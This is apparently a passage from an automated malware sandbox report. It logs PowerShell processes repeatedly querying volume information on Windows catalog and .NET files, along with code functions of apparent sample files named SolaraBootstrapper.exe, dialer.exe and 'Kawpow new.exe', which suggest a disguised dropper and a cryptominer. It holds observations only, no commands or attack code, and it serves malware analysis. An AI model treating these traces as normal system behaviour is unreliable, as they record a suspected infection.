Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E82477960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,19_2_0000027E82477960
